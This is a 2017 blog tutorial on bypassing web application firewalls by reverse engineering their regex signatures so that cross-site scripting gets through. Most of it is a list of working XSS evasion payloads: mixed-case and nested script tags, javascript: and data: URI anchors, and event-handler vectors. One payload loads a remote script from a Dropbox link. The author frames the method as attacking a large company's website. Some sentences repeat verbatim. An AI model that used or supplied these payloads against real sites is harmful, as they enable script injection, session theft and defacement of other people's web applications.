Computer Security, Cross-site scripting, Penetration Testing, Technology, Tutorials

How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing

May 25, 2017

What is Regular Expression Reversing (Reg-ex Reversing)?

Strong web application firewalls (WAFs) used by large enterprises are typically capable of resisting WAF bypass techniques like brute forcing which revolves around utilizing arbitrary made payloads to test the power and configurations of Web Application Firewalls.

Hence, there is a need to use another technique to bypass the WAFs.

This technique aka Regular Expression Reversing (Regex Reversing) exploits the WAF’s entrenched propensity to juxtapose attack payloads with the signatures of the WAF situated in their databases. The signatures are usually complex regular expressions.

Picture Me (Sunny) In This Imaginary Scenario

To simplify the matter, picture me in this fictitious and highly entertaining scenario:

Sunny casually launches attacks on a Forbes 50 website shielded by an extremely overpriced and sensitive Web Application Firewall via employing various attack payloads.

If the payloads pairs with the Regex then a response from the WAF is elicited and contrariwise.

Sunny takes a good chunk of his time out of his life and focuses his energy on reversing the WAF’s signatures.

Sunny eventually grasps the Web Application Firewall for what it has been programmed to block. As this feeling of familiarity is recognized, Sunny begins to craft a compelling malicious payload which allows him to bypass the WAF effectively with ease.

Why Is Reverse Engineering A Web Application The Best Way To Bypass A WAF?

Okay, so I hope you enjoyed that little skit.

Anyways, Regular expression reversing is a very powerful technique for bypassing WAFs. With this method, we are essentially reverse engineering a WAF’s signatures to understand and perceive what it is currently blocking. As we successfully establish a list of all potential inputs that the WAF has been blocking, we use this understanding to easily build a bypass.

With this method, we are essentially reverse engineering a WAF’s signatures to understand and perceive what it is currently blocking. As we successfully establish a list of all potential inputs that the WAF has been blocking, we use this understanding to easily build a bypass.

As we successfully establish a list of all potential inputs that the WAF has been blocking, we use this understanding to easily build a bypass.

Of course, this method is not perfect and has failed at times. Therefore, if we were eagerly in need to defeat the WAF, then we would need to go beyond what is required. This would mean turning to the exploitation of browser bugs which requires a high degree of skill and mastery to execute properly.

But for purposes of this article, we will focus exclusively on Regular Expression Reversing.

Using Harmless HTML Tags For Testing Purposes

What we need to do first is inject harmless HTML tags like <b>, <br>, and <i> to check if the firewall filter is blocking <, > brackets.

It is important to become aware of the response after we have injected the code. This response can vary since each filter may differ drastically.

We have to ask whether the <, > codes are becoming stripped or HTML encoded. And whether it is just < or > being stripped or is it both?

In circumstances where you have discovered that the firewall filter is blocking or even stripping both tags simultaneously, check to see if there is any decoding of HTML entities by the filter.

In such a scenario, the subsequent ought to be injected:

\u003cb\u003e

&lt;b&gt;

\x3cb\x3e
----------------------

Do pay attention to the response and determine if the firewall filter is decoding the entities in its initial form.

At this point, if you notice that the filter is not doing that then it is a good idea to move on and experiment with the following:

Injection Using The Common Method Of A Script Tag

A <script> tag is a well-known method utilized for injection of JavaScript.

Do keep in mind that this is one of the earliest firewall signatures that are created by the cyber security WAF vendor. Therefore, the chances of discovering a bypass against a well-established firewall filter are going to be quite low.

The subsequent contain variations that you should experiment with:

<sCrIPt>alert(1);</sCriPT>

<script%20src="//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">


<svg><script>alert&DiacriticalGrave;1&DiacriticalGrave;<p>

<svg><script>alert&grave;1&grave;<p>


"><svg><script>alert`1`
<script
Confirm(1);</script>

<SCriPt>delete alert;alert(1)</sCriPt>
--------------

Recursive filters

There may be instances where you may face a filter that strips codes like <script> and <iframe>.

If you do happen to experience this, the code below will likely defeat the filter:

<scr<script>ipt>alert(1)</scr<script>ipt>

------------

Flaws With Data Sanitization

Even though “script” may be stripped from every input, I will provide a subsequent payload that illustrates how a malicious actor can use to his advantage:

/?param="%3c%cscripscriptt+src%3d/site/a.js%3e

As you can see, the payload includes the blacklisted word “script”. The filter removes one “script” word from the payload. This leaves a hole among “scrip” and “t which ameliorates the blacklisted word.

Therefore, the filter removes the blacklisted word, while simultaneously leaving the other one intact.

In other words, a filter that emphasizes on stripping SQL-related filtered words such as “SELECT” and “UNION” with the expectation that even if a SQL injection attack is pinpointed, the malicious actor would be incapable of exploiting the vulnerability to its full potential. This mindset accompanied with substandard countermeasures which include blocking vulnerabilities is in reality significantly different than fixing vulnerabilities.

The security approach of removing one prohibited word while leaving the other intact merely shows that it has failed to recursively exert the blacklist.

As I have demonstrated in this section, it is always a better idea to address the exploits than attempting to outwit a resolute adversary.

Use other tags

If <script> and </script> are being blocked with whitespaces, the above will be concatenated. This creates a valid JavaScript syntax which permits you to bypass the filter restrictions.

If the filter has implemented stringent rules against <script> then we must use anchor <a>.

The subsequent attack vector ought to be used:

<a href="http//www.google.ca>OwnedBySunny</a>

------------

If <a> and “href” were not stripped out, proceed using the code below:

<a href=”javascript:”>OwnedBySunny</a>

————

If the entire JavaScript keyword and “:” were not stripped, utilize the subsequent:

<a href="javasCripT:alert(1)">OwnedBySunny</a>

————

If the JavaScript keyword and parenthesis had been filtered by the WAF, use the subsequent HTML5 entity to get bypass the filter:

<a href=‘javascript:http://@cc_on/confirm%28location%29’>OwnedBySunny</a>

-----------

Also, use the following payload:

<a href=“data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt”>OwnedBySunny<test>

—————

I could keep going and going with attack vectors. But I feel that I’ve covered enough and will conclude with a few exceptional payloads that can evade filter detection:

“><p id=“”onmouseover=\u0070rompt(1) //

<q/oncut=alert(1)>

<form oninput=alert(1)></input></form>

<body/onhashchange=alert(1)><a href=#>ownedbysunny

You Might Also Like

Back to top
%d bloggers like this: